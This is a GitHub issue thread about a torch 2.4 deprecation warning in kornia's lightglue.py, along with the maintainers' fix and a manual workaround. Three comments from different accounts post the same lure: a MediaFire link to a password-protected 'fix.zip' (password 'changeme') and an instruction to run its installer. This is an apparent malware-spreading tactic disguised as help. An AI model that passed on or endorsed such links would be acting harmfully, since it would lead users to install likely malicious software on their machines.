### ISSUE TITLE
Compatibility issue with torch 2,4

### ISSUE THREAD

**Issue by pandayummy** [kornia/kornia#3002]
C:\Users\CHENG\AppData\Roaming\ComfyUI_windows_portable\python_embeded\Lib\site-packages\kornia\feature\lightglue.py:44: 

FutureWarning: `torch.cuda.amp.custom_fwd(args...)` is deprecated. Please use `torch.amp.custom_fwd(args..., device_type='cuda')` instead.

Torch 2.4
https://pypi.org/project/torch/

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by amaissen** [comment]
Fixed on main branch with #2967

**Comment by pandayummy** [comment]
![image](https://github.com/user-attachments/assets/2aa6ac15-1ea8-4d13-8480-cc2c744dd0f7)


"C:\Users\CHENG\AppData\Roaming\ComfyUI_windows_portable\python_embeded\Lib\site-packages\kornia\feature\lightglue.py"

Opening this file, I can still find  related code:

![image](https://github.com/user-attachments/assets/2aa6ac15-1ea8-4d13-8480-cc2c744dd0f7)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by edgarriba** [comment]
@pandayummy the fix is gonna be part of next release 0.7.4 by the end of september [[see](https://github.com/kornia/kornia/wiki/2024#infrastructure)]

**Comment by pandayummy** [comment]
OK, I did a a temp fix by editting that line to

@torch.amp.custom_fwd(cast_inputs=torch.float32, device_type='cuda')

**Comment by edgarriba** [comment]
> I think this was fixed on main branch with #2967
